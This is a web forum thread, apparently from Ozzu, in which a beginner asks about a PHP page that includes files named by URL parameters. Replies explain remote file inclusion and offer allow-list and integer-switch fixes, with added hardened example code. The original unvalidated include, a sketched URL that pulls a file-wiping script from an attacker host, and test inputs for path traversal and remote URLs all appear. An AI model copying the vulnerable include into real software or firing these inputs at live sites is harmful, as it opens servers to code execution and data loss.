PHP Includes

  • MasterSlowPoke
  • Newbie
  • Posts: 7
  • Loc: Tampa

Post 3+ Months Ago

I include the variable portion of my site, and have the static portions remain. I only use one .PHP file. A while back, someone on some forum said my code was inefficient, but didn't explain why. I'm rebuilding my site, and would like to see how I could soup it up. This is my current code.

Code:
the top banner, layout, etc.
<?php
  // $HTTP_GET_VARS is the pre-PHP 4.1 name for $_GET; the raw value of
  // ?page= (or ?album=) is dropped straight into the include path
  if(!empty($HTTP_GET_VARS['page']) and file_exists("./$HTTP_GET_VARS[page].inc"))
   { include("./$HTTP_GET_VARS[page].inc"); }
  elseif(!empty($HTTP_GET_VARS['album']) and file_exists("photos/$HTTP_GET_VARS[album].inc"))
   { include("photos/$HTTP_GET_VARS[album].inc"); }
  else {
    include("./main.inc");
  }
?>
the footer, </body> etc.
  • Scorpius
  • Proficient
  • Posts: 401
  • Loc: Scorpion Hole

Post 3+ Months Ago

Ok, well first off, you don't need to use $HTTP_GET_VARS anymore; unless you are using a really old version of PHP, you can just use $_GET['variable'].
Second, what he probably meant was that it showed too much information about your pages, like exactly where they were placed. Now, if you wanted to, you could use Apache's mod_rewrite function. Lots of websites are using this now to hide their full URLs from their users. For example, Ozzu does it.
But you can have something like http://www.yoursite.com/content/pagename
You can look here: http://www.ozzu.com/programming-forum/quick-tip-mod-rewrite-t23460.html for a detailed explanation of how to set up your rewrite design.
  • rjstephens
  • Professor
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

I can't remember how to exploit it offhand, but you should NEVER do anything with an include that is based on user input unless you validate it first; it opens you up to easy hacking.
  • MasterSlowPoke
  • Newbie
  • Posts: 7
  • Loc: Tampa

Post 3+ Months Ago

All I use are links so I think I should be safe.

What would be the advantage of the rewrite dealie? It seems like it would just change what the links look like, the code I use would be the same.
  • rjstephens
  • Professor
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

Just because you are only using links doesn't make it safe. You are at just as much risk. What's stopping people from changing the URL?
  • rtm223
  • Mastermind
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

As I recall, the exploit goes <i>something</i> along the lines of typing in:

http://www.yourdomain.com/?http://www.e ... m/wipe_hdd

which goes and gets wipe_hdd.inc (by http) from evilbastard.com and then happily runs any php code in that file. In this case, a nice little script that deletes all the files on your website. I'm not sure if that is 100% correct. There are a hell of a lot of exploits like this, and I have never used them, I just learned the techniques to guard against them.

In your situation, the simplest way of doing it would be to do a variation on the following:

Code:
$allowedPages = array(
  'pageName1' => 1,
  'pageName2' => 1,
  'pageName3' => 1,
  'pageName4' => 1
);

// read the parameter once, defaulting to '' so a missing ?page= never raises a notice
$page = isset($_GET['page']) ? $_GET['page'] : '';

// only a name that is a key in the array AND set to 1 gets through
if (isset($allowedPages[$page]) && $allowedPages[$page]) {
  //test for the file existing if you want
  //load the file
}

This will check to see if the file is allowed as defined by that array. You can also set elements to 0 to temporarily disable a page, without having to delete it. Just a handy extra thing I thought up.
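Added example (not part of rtm223's post or any code from the thread): the first post's front controller rewritten around the allow-list idea above, using $_GET. The page list, the photos directory and the sample requests are invented for illustration. The page name is only ever used as a key into a map, so no part of it can reach the include path; album names, which the original wants to add without editing code, are instead limited to a conservative character set and then confirmed with realpath() to live inside the photos directory. A mod_rewrite rule only maps a prettier URL back onto the same $_GET['page'], so this check belongs in the PHP no matter what the links look like.

```php
<?php
// Added example (not from the original thread): the same front-controller idea
// as the first post, rewritten so the include path can never be chosen by the
// client. Directory names, page names and sample requests are made up.
declare(strict_types=1);

// Allow-list: the request parameter is only ever used as a KEY into this map.
// The values are the real files; the user never supplies any part of a path.
const PAGES = [
    'main'    => 'main.inc',
    'about'   => 'about.inc',
    'contact' => 'contact.inc',
];

// Photo albums live in one directory; only bare names are accepted.
const ALBUM_DIR = __DIR__ . '/photos';

function resolveInclude(array $get): string
{
    // Page lookup: the map both validates and resolves the value. is_string()
    // matters because ?page[]=x arrives as an array, not a string.
    if (isset($get['page']) && is_string($get['page'])
        && array_key_exists($get['page'], PAGES)) {
        return __DIR__ . '/' . PAGES[$get['page']];
    }

    // Album lookup: albums get added without editing code, so no map here.
    // Restrict the name to a conservative character set (no '/', '.', or NUL),
    // then confirm the resolved path really sits inside ALBUM_DIR (this also
    // catches a symlink pointing elsewhere).
    if (isset($get['album']) && is_string($get['album'])
        && preg_match('/\A[a-z0-9_-]{1,64}\z/', $get['album']) === 1) {
        $candidate = realpath(ALBUM_DIR . '/' . $get['album'] . '.inc');
        $root      = realpath(ALBUM_DIR);
        if ($candidate !== false && $root !== false
            && strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0) {
            return $candidate;
        }
    }

    // Fail closed: anything unknown gets the default page, never an error
    // message that echoes the attacker's input back.
    return __DIR__ . '/' . PAGES['main'];
}

// Constructed sample requests and what each resolves to with the hardened code.
$samples = [
    ['page' => 'about'],
    ['page' => '../../etc/passwd'],        // traversal: not a key, rejected
    ['page' => 'http://evil.example/x'],   // remote URL: not a key, rejected
    ['page' => ['about']],                 // ?page[]=about: not a string, rejected
    ['album' => 'summer2005'],             // valid name; needs photos/summer2005.inc to exist
    ['album' => '../main'],                // fails the regex, rejected
    ['album' => "x\0"],                    // NUL byte, fails the regex
    [],                                    // no parameters at all
];
foreach ($samples as $get) {
    printf("%-36s -> %s\n", json_encode($get), basename(resolveInclude($get)));
}
```

In the real page, `include resolveInclude($_GET);` replaces the whole if/elseif chain from the first post; the loop at the bottom only prints what each constructed request resolves to. Run stand-alone there is no photos directory, so the album sample falls through to main.inc like the rejected ones.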
  • Rabid Dog
  • Web Master
  • Posts: 3245
  • Loc: South Africa

Post 3+ Months Ago

This is one of the reasons that I don't use dynamic include statements.

I'd rather create separate functions with strong exception handling.

Always remember to test user input. I find passing an integer rather than a string works nicely (makes it difficult to guess); check whether the value is an int, make your selection in a case statement, and have a default case to fail on any anomalies.

What's nice about this is that you can set constants to have a more descriptive name, i.e.
PHP Code:
// an integer, so it compares cleanly with the validated int
define("ACTION_RETRIEVE_PAGE", 1);


and in your select statement
PHP Code:
switch ($inputVar) {
  case ACTION_RETRIEVE_PAGE:
    //do stuff
    break;
  default:
    // error generated
}
(not sure if the syntax is right but you get the idea)
Anyways that's just me
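Added example (not Rabid Dog's code): the integer-action pattern from the post above filled in, with filter_var() doing the "is it really an int" check before the switch reaches a case. The action numbers, handler bodies and sample inputs are invented for illustration. The validation step is what makes the switch safe, because switch compares with == and would otherwise happily match "1abc" against case 1.

```php
<?php
// Added example (not Rabid Dog's code): integer action code, validated, then
// dispatched through a switch with a failing default. Action numbers and
// handler bodies are invented for illustration.
declare(strict_types=1);

define('ACTION_RETRIEVE_PAGE', 1);
define('ACTION_LIST_ALBUMS', 2);

function handleAction($raw): string
{
    // Validate before the switch: FILTER_VALIDATE_INT returns false for
    // "1abc", "1.0", "0x1", "" and arrays, and a real int otherwise.
    $action = filter_var($raw, FILTER_VALIDATE_INT);
    if ($action === false) {
        return 'error: action must be an integer';
    }

    // switch compares with ==, which is only safe because $action is now a
    // genuine int; the constants keep the cases readable.
    switch ($action) {
        case ACTION_RETRIEVE_PAGE:
            return 'retrieve page';
        case ACTION_LIST_ALBUMS:
            return 'list albums';
        default:
            // Fail closed for every other value, 0 and negatives included.
            return 'error: unknown action ' . $action;
    }
}

// Constructed sample inputs, as they would arrive in $_GET['action'].
foreach (['1', '2', '3', '1abc', '', ['1']] as $raw) {
    printf("%-8s -> %s\n", json_encode($raw), handleAction($raw));
}
```

In the page itself the call would be `handleAction($_GET['action'] ?? '')`, and the default branch is where the 404 or error page goes; the point is that an unrecognised value can never select code.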
  • MasterSlowPoke
  • Newbie
  • Posts: 7
  • Loc: Tampa

Post 3+ Months Ago

For the rewrite thing then, couldn't they type in indexhttp://www.haxxorz/malscript.php, or does that not work / assume that they know exactly how the rewrite works and wouldn't usually happen?

As for the allowed pages thing, all I would have to do is add the include to the list, then paste that if statement above the includes, then after the includes have an else statement that loads an omg haxxor page or something?

Sorry, I know little PHP; I pretty much just copied my include statement off a tutorial, though I did write the elseif by myself. I was so happy when I finally got the statement right; I tried to guess the right word for half an hour or so before I finally tried elseif.

Post Information

  • Total Posts in this topic: 8 posts

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.